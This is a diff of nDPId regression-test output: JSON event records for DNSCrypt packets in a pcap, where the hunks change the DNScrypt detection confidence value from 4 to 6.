AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":48065,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":48065,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":287,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317403} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":287,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAABQmsUAub0Rx2IKAAABM56mYQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":946739317428,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739317428,"pkt":"ZmZmZmZmRERERERECABFAADXKhpAADMRgkAznqZhCgAAAQG7kKsAw\/s4B2KBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAQt4OLzm4x3OBnTPVYOyWbwQ07ZuPzfh5UHeUSDpkuLilk8PnzqIG19XCvUsQGZmTzZ+d2RjpSDvvlP\/+37YoDPjwKVuBVGSevZiWx3QxU\/Ww92uJXMr1\/GUOUVCxbO0A+PApW4FUZJwAAAAFfU6w6X1T9ug=="} 
@@ -581,28 +581,28 @@ 00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":946739317431,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739317431,"pkt":"ZmZmZmZmRERERERECABFAADXKhtAADQRgT8znqZhCgAAAQG7uJkAw9NNB1+BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAQt4OLzm4x3OBnTPVYOyWbwQ07ZuPzfh5UHeUSDpkuLilk8PnzqIG19XCvUsQGZmTzZ+d2RjpSDvvlP\/+37YoDPjwKVuBVGSevZiWx3QxU\/Ww92uJXMr1\/GUOUVCxbO0A+PApW4FUZJwAAAAFfU6w6X1T9ug=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":41717,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAIc141AAL0RhaIKAAABsDjtq6L1AbsCCGC6smcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":41717,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":41717,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739317432,"pkt":"ZmZmZmZmRERERERECABFAADXKhxAADMRgj4znqZhCgAAAQG7s\/IAw9f2B12BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAQt4OLzm4x3OBnTPVYOyWbwQ07ZuPzfh5UHeUSDpkuLilk8PnzqIG19XCvUsQGZmTzZ+d2RjpSDvvlP\/+37YoDPjwKVuBVGSevZiWx3QxU\/Ww92uJXMr1\/GUOUVCxbO0A+PApW4FUZJwAAAAFfU6w6X1T9ug=="} 
00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739317432,"pkt":"ZmZmZmZmRERERERECABFAADXKh5AADMRgjwznqZhCgAAAQG7664Aw6A5B16BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAQt4OLzm4x3OBnTPVYOyWbwQ07ZuPzfh5UHeUSDpkuLilk8PnzqIG19XCvUsQGZmTzZ+d2RjpSDvvlP\/+37YoDPjwKVuBVGSevZiWx3QxU\/Ww92uJXMr1\/GUOUVCxbO0A+PApW4FUZJwAAAAFfU6w6X1T9ug=="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":55046,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAXc144gAL0RoeEKAAABsDjtq9cGAbsGBFSSsmQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":55046,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":55046,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":295,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317432} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":295,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAABQ144Aub0RxrQKAAABsDjtqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":51363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317432,"pkt":"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"} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":51363,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":51363,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":36676,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAXc15AgAL0Rod8KAAABsDjtq49EAbsGBJxWsmIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":36676,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":36676,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":298,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317432} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":298,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAABQ15AAub0RxrIKAAABsDjtqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":49008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
